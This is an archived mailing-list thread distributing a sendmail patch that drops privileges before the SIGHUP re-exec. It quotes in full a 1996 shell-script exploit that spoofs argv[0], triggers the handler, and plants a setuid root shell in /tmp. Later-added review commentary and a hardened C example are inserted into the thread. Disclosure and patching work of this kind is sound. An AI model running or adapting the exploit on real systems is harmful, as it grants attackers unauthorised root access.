Subject: Re: BoS: Exploit for sendmail smtpd bug (ver. 8.7-8.8.2). (fwd)
To: netbsd-users@NetBSD.ORG, NetBSD-current Users <current-users@NetBSD.ORG>
From: Curt Sampson <cjs@portal.ca>
List: netbsd-users
Date: 04/23/1997 21:30:14
Here's a patch you'll probably want to apply ASAP.

I wonder if we don't need a netbsd-security list so that those
people who don't want patches for this sort of thing (if there are
any :-)) don't have to see this stuff.

cjs

Curt Sampson    cjs@portal.ca		Info at http://www.portal.ca/
Internet Portal Services, Inc.	
Vancouver, BC   (604) 257-9400		De gustibus, aut bene aut nihil.

---------- Forwarded message ----------
Date: Sat, 16 Nov 1996 00:15:39 -0800 (PST)
From: Curt Sampson <cjs@portal.ca>
To: Leshka Zakharoff <leshka@leshka.chuvashia.su>
Cc: best-of-security@suburbia.net
Subject: Re: BoS: Exploit for sendmail smtpd bug (ver. 8.7-8.8.2).


Huh. Yet another gaping hole, can you believe it? This is entirely
platform-independent, and has not yet been fixed in 8.2.2. Here's
the patch to fix it. This was done on 8.7.6; the line numbers may
differ in other versions but the patch is the same.

------------------------------------------------------
--- main.c.old  Mon Sep 16 12:56:01 1996
+++ main.c      Fri Nov 15 23:56:48 1996
@@ -1693,14 +1693,16 @@
 sighup()
 {
 #ifdef LOG
        if (LogLevel > 3)
                syslog(LOG_INFO, "restarting %s on signal", SaveArgv[0]);
 #endif
        releasesignal(SIGHUP);
+       (void) setgid(RealGid);
+       (void) setuid(RealUid);
        execv(SaveArgv[0], (ARGV_T) SaveArgv);
 #ifdef LOG
        if (LogLevel > 0)
                syslog(LOG_ALERT, "could not exec %s: %m", SaveArgv[0]);
 #endif
        exit(EX_OSFILE);
 }
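Review bot: the two added calls throw away their return values, so if setgid() or setuid() fails the handler still falls through to execv(SaveArgv[0]) with root intact; check each result and take the existing "could not exec" / exit(EX_OSFILE) path on failure instead of the `(void)` casts. Supplementary groups are not dropped either (no setgroups() before the setgid()). The ordering, setgid() before setuid(), is right. Dropping privilege here does block what the quoted exploit does (start sendmail with argv[0] set to /tmp/smtpd, then send SIGHUP so this handler execs that path as root), but since SaveArgv[0] is whatever the caller passed in, the handler would be safer still exec'ing a compiled-in path rather than SaveArgv[0].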
------------------------------------------------------

Now who the heck do I send this to to get it back into sendmail? There
are no e-mail addresses listed for bug reports in the READ_ME file, or
anywhere else for that matter.

cjs

Curt Sampson    cjs@portal.ca		Info at http://www.portal.ca/
Internet Portal Services, Inc.	
Vancouver, BC   (604) 257-9400		De gustibus, aut bene aut nihil.

On Sat, 16 Nov 1996, Leshka Zakharoff wrote:

> Date: Sat, 16 Nov 1996 04:10:16 +0300 (MSK)
> From: Leshka Zakharoff <leshka@leshka.chuvashia.su>
> To: best-of-security@suburbia.net
> Subject: BoS: Exploit for sendmail smtpd bug (ver. 8.7-8.8.2).
> Resent-Date: Sat, 16 Nov 1996 17:32:01 +1100
> Resent-From: best-of-security@suburbia.net
> 
> #-------------------------------- CUT HERE -------------------------------------
> #!/bin/sh
> #
> #
> #                                   Hi !  
> #                This is exploit for sendmail smtpd bug
> #    (ver. 8.7-8.8.2 for FreeBSD, Linux and may be other platforms).
> #         This shell script does a root shell in /tmp directory.
> #          If you have any problems with it, drop me a letter.
> #                                Have fun !                              
> #
> #
> #                           ----------------------                 
> #               ---------------------------------------------  
> #    -----------------   Dedicated to my beautiful lady   ------------------
> #               ---------------------------------------------
> #                           ----------------------
> #
> #          Leshka Zakharoff, 1996. E-mail: leshka@leshka.chuvashia.su
> #
> #
> #
> echo   'main()                                                '>>leshka.c
> echo   '{                                                     '>>leshka.c
> echo   '  execl("/usr/sbin/sendmail","/tmp/smtpd",0);         '>>leshka.c
> echo   '}                                                     '>>leshka.c
> #
> #
> echo   'main()                                                '>>smtpd.c
> echo   '{                                                     '>>smtpd.c
> echo   '  setuid(0); setgid(0);                               '>>smtpd.c
> echo   '  system("cp /bin/sh /tmp;chmod a=rsx /tmp/sh");      '>>smtpd.c
> echo   '}                                                     '>>smtpd.c
> #
> #
> cc -o leshka leshka.c;cc -o /tmp/smtpd smtpd.c
> ./leshka
> kill -HUP `ps -ax|grep /tmp/smtpd|grep -v grep|tr -d ' '|tr -cs "[:digit:]" "\n"|head -n 1`
> rm leshka.c leshka smtpd.c /tmp/smtpd
> /tmp/sh
> #-------------------------------- CUT HERE -------------------------------------
> 
>
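The two points the patch and the quoted exploit turn on, written out as an added C example (this is not sendmail's code and not from anyone on this thread): argv[0] is picked by whoever exec'd the process, so a privileged re-exec must not trust SaveArgv[0] as a path, and a privilege drop before exec has to be checked rather than cast to void. The install path /usr/sbin/sendmail and the function names are assumptions for the example; the handler body is modelled on sighup() above but execs a fixed path.

```c
#define _GNU_SOURCE
#include <grp.h>
#include <stdio.h>
#include <string.h>
#include <sys/types.h>
#include <sysexits.h>
#include <unistd.h>

/* Assumed install path for the example; a real build uses the site's. */
#define SENDMAIL_PATH "/usr/sbin/sendmail"

/*
 * argv[0] is chosen by the caller.  The quoted exploit runs
 * execl("/usr/sbin/sendmail", "/tmp/smtpd", 0), so SaveArgv[0] becomes
 * "/tmp/smtpd" and a SIGHUP makes the root process exec that file.
 * Only the path we were installed as is acceptable as a re-exec target.
 */
int reexec_target_is_trusted(const char *saved_argv0)
{
    return saved_argv0 != NULL && strcmp(saved_argv0, SENDMAIL_PATH) == 0;
}

/*
 * Permanently give up root before re-exec.  Supplementary groups first
 * (setgroups needs privilege), then gid, then uid.  Every result is
 * checked and the drop is verified afterwards.  Returns 0 on success,
 * -1 if any step failed, in which case the caller must not exec.
 */
int drop_privileges(uid_t uid, gid_t gid)
{
    if (geteuid() == 0 && setgroups(1, &gid) != 0)
        return -1;
    if (setgid(gid) != 0 || setuid(uid) != 0)
        return -1;
    if (getuid() != uid || geteuid() != uid ||
        getgid() != gid || getegid() != gid)
        return -1;
    /* If root can still be regained, the drop did not take. */
    if (uid != 0 && setuid(0) == 0)
        return -1;
    return 0;
}

/* Hardened handler body: refuse a spoofed argv[0], drop, exec a fixed path. */
void hardened_sighup(char *const saved_argv[], uid_t real_uid, gid_t real_gid)
{
    if (!reexec_target_is_trusted(saved_argv[0]))
        _exit(EX_OSFILE);
    if (drop_privileges(real_uid, real_gid) != 0)
        _exit(EX_OSFILE);
    execv(SENDMAIL_PATH, saved_argv);
    _exit(EX_OSFILE);           /* only reached if execv failed */
}

int main(void)
{
    /* Constructed inputs: the exploit's spoofed argv[0] and the real one. */
    printf("/tmp/smtpd trusted: %d\n", reexec_target_is_trusted("/tmp/smtpd"));
    printf("%s trusted: %d\n", SENDMAIL_PATH,
           reexec_target_is_trusted(SENDMAIL_PATH));
    /* Dropping to our own ids succeeds whether or not we started as root. */
    printf("drop to own ids: %d\n", drop_privileges(getuid(), getgid()));
    return 0;
}
```

Run unprivileged, the drop to the process's own uid/gid succeeds and the spoofed argv[0] is rejected; run as root, setgroups() and the post-drop setuid(0) probe are what make the difference between a checked drop and the patch's `(void)` calls.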